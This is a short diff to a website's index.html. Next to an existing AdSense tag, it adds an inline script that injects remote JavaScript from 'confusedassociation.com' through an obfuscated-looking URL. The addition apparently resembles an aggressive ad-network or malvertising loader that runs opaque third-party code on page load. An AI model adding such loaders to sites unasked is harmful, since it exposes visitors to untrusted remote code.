--- a/index.html
+++ b/index.html
@@ -7,7 +7,25 @@
 
     <script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-2814008505726528"
      crossorigin="anonymous"></script>
-     
+   
+
+
+<script>
+(function(tpwh){
+var d = document,
+    s = d.createElement('script'),
+    l = d.scripts[d.scripts.length - 1];
+s.settings = tpwh || {};
+s.src = "\/\/confusedassociation.com\/b-XzVMsJd.Gulm0aY\/WKcT\/he\/mt9ZuKZLUVl\/kYPFT\/YDzoNWDDk\/4kNkTBQStaNxjeMr0NO\/TBgq1ENzQL";
+s.async = true;
+s.referrerPolicy = 'no-referrer-when-downgrade';
+l.parentNode.insertBefore(s, l);
+})({})
+</script>
+
+
+
+  
 
 <meta name="b32406524d801736cd6bff3aae3905c437cd8300" content="b32406524d801736cd6bff3aae3905c437cd8300" />
     <link href="https://fonts.googleapis.com/css2?family=Inter&family=Roboto&family=Open+Sans&family=Lato&family=Montserrat&family=Poppins&family=Nunito&family=Raleway&family=Ubuntu&family=DM+Sans&family=Work+Sans&family=Source+Sans+Pro&family=Fira+Sans&family=Titillium+Web&family=Manrope&family=Cabin&family=IBM+Plex+Sans&family=Asap&family=Mulish&family=Lexend&family=Space+Grotesk&family=Plus+Jakarta+Sans&family=Sora&family=Urbanist&family=Epilogue&display=swap" rel="stylesheet">
